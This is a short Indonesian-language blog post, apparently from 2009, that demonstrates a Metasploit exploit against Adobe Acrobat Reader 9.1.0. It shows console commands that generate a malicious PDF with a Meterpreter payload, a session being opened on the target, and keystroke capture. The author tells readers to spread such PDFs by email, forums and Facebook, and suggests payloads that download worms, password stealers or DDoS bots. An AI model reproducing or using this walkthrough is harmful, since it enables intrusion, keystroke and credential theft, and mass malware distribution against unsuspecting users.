888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 476 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7893 updated today (2009.12.16)
msf > version
Framework: 3.3.3-dev.7817
Console : 3.3.3-dev.7855
msf > use windows/fileformat/adobe_media_newplayer
msf exploit(adobe_media_newplayer) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(adobe_media_newplayer) > set RHOST 172.16.30.129
RHOST => 172.16.30.129
msf exploit(adobe_media_newplayer) > exploit
[*] Started bind handler
[*] Creating 'msf.pdf' file...
[*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
Dear newbie, silahkan copy file msf.pdf ke komputer target untuk dibuka menggunakan adobe acrobat reader. Dalam eksperimen ini saya menggunakan adobe acrobat reader versi 9.1.0 di windows XP SP3 (non DEP).
msf exploit(adobe_media_newplayer) > exploit [*] Started bind handler [*] Creating 'msf.pdf' file... [*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (172.16.30.1:57665 -> 172.16.30.129:4444) meterpreter > idletime User has been idle for: 2 mins 25 secs meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... www.google.com meterpreter > ctrl-z Background session 1? [y/N]
Well, tentu saja dry joke (talking ’bout artist di blog kecoak???) di malam hari menjelang tidur ini bukan untuk high skilled exploiter. Hanya menunjukan sedikit mainan dari exploit terbaru Adobe acrobat reader menggunakan metasploit framework. Dalam contoh diatas tentu saja tidak selalu harus untuk kepentingan RCE (Remote Command Execution), bisa di-imajinasikan jika payload yang digunakan adalah “windows/download_exec” dari url tertentu dimana pada url tersebut telah tersimpan worm, program kecil pencuri password (paypal, email, facebook, banking), program kecil pencuri keystroke di windows, program kecil yang dapat men-scan document untuk mencari data tertentu (misal: doc pemerintahan, bisnis), ataupun sekedar bot untuk menjadi slave serangan ddos.
Cukup sebar file .pdf tersebut melalui email, irc, milist, forum, facebook, dll. Dan dalam sekejap, banyak hal yang kita inginkan bisa didapatkan. Itu sebabnya vuln dari software seperti adobe acrobat reader yang notabene pasti ada di setiap komputer windows sangat berbahaya, berbagai level dan kalangan menggunakan aplikasi tersebut, sehinggal 0day nya akan berakibat fatal.
So, take care, fellas!